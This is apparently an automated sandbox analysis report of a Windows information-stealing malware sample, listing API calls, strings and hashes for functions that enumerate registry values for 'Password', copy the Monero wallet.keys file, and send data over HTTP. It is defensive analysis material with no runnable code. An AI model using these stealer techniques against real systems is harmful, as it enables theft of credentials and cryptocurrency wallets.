                                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1973479514-0
                                                                                                                                                                                                                                      • Opcode ID: b88ce79a549242afc3ca3ed91b5888e783d7b8ee3b3d8d3205f4e2b3c424bd9c
                                                                                                                                                                                                                                      • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b88ce79a549242afc3ca3ed91b5888e783d7b8ee3b3d8d3205f4e2b3c424bd9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1666 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1681 404604 1666->1681 1682 40460b-40460f 1666->1682 1681->1682 1683 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1682->1683 1684 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1682->1684 1683->1684 1770 404793-404797 1683->1770 1694 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1684->1694 1695 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1684->1695 1695->1694 1771 4047a5 1770->1771 1772 404799-4047a3 1770->1772 1773 4047af-4047e2 HttpOpenRequestA 1771->1773 1772->1773 1774 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1773->1774 1775 404b7e-404b85 InternetCloseHandle 1773->1775 1886 404af2-404b1c InternetReadFile 1774->1886 1775->1684 1887 404b27-404b79 InternetCloseHandle call 416e00 1886->1887 1888 404b1e-404b25 1886->1888 1887->1775 1888->1887 1890 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1888->1890 1890->1886
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,04070728), ref: 004045FA
                                                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04070738), ref: 00404AA8
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,04070628,?,04078280,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                      • String ID: "$"$------$------$------$J&f
                                                                                                                                                                                                                                      • API String ID: 460715078-2398766951
                                                                                                                                                                                                                                      • Opcode ID: 7cda8d5521d99cf19aaaaf71ff52ec70d860003ad009979284783f799879de92
                                                                                                                                                                                                                                      • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cda8d5521d99cf19aaaaf71ff52ec70d860003ad009979284783f799879de92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,04073228,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                                      • String ID: - $%s\%s$?
                                                                                                                                                                                                                                      • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                                      • Opcode ID: f99f990ee98b2c87e49eb54a0476dff1419a0cb08dcebe01bba17a831a97a86a
                                                                                                                                                                                                                                      • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99f990ee98b2c87e49eb54a0476dff1419a0cb08dcebe01bba17a831a97a86a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 348468850-0
                                                                                                                                                                                                                                      • Opcode ID: 3c0a368077967c4d6cb00d96c460f66b96e072591d38366c86bc8a63ce48f73f
                                                                                                                                                                                                                                      • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c0a368077967c4d6cb00d96c460f66b96e072591d38366c86bc8a63ce48f73f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                        • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                        • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                        • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                        • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                        • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                      • API String ID: 2054947926-218353709
                                                                                                                                                                                                                                      • Opcode ID: 55317b6d737fdd9b0cce10d4996af803ea1c6e882ae9976ce4a7b1677b3be5f7
                                                                                                                                                                                                                                      • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55317b6d737fdd9b0cce10d4996af803ea1c6e882ae9976ce4a7b1677b3be5f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                        • Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                        • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                        • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                        • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                        • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(30A54020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(30A54020,00000000), ref: 00407018
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(30A54020, : ), ref: 0040702A
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(30A54020,00000000), ref: 0040705F
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(30A54020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(30A54020,00000000), ref: 004070A3
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(30A54020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                      • task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                                      • String ID: : $`v@$h0A
                                                                                                                                                                                                                                      • API String ID: 3191641157-3559972273
                                                                                                                                                                                                                                      • Opcode ID: 1bad08d2076e3e89f4364c8d83dbdbb36a614798d25560e064741be9e1e65df2
                                                                                                                                                                                                                                      • Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bad08d2076e3e89f4364c8d83dbdbb36a614798d25560e064741be9e1e65df2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: image/jpeg
                                                                                                                                                                                                                                      • API String ID: 0-3785015651
                                                                                                                                                                                                                                      • Opcode ID: 404b0b46b206b3bf4871344594db70cb3467a452f73d0affe24fd8bd6f785462
                                                                                                                                                                                                                                      • Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 404b0b46b206b3bf4871344594db70cb3467a452f73d0affe24fd8bd6f785462
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                                                                                                                                                      • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                                                                                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                                                                                                      • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                                      • String ID: c.A$c.A
                                                                                                                                                                                                                                      • API String ID: 3066467675-270182787
                                                                                                                                                                                                                                      • Opcode ID: b883753fc3e69b7f41e944ae3663d1622002b5338cc9304bc8ff2cb9a4e93150
                                                                                                                                                                                                                                      • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b883753fc3e69b7f41e944ae3663d1622002b5338cc9304bc8ff2cb9a4e93150
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                        • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                                                                                                      • task.LIBCPMTD ref: 00406F25
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                      • String ID: Password
                                                                                                                                                                                                                                      • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                                      • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                      • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004142DD
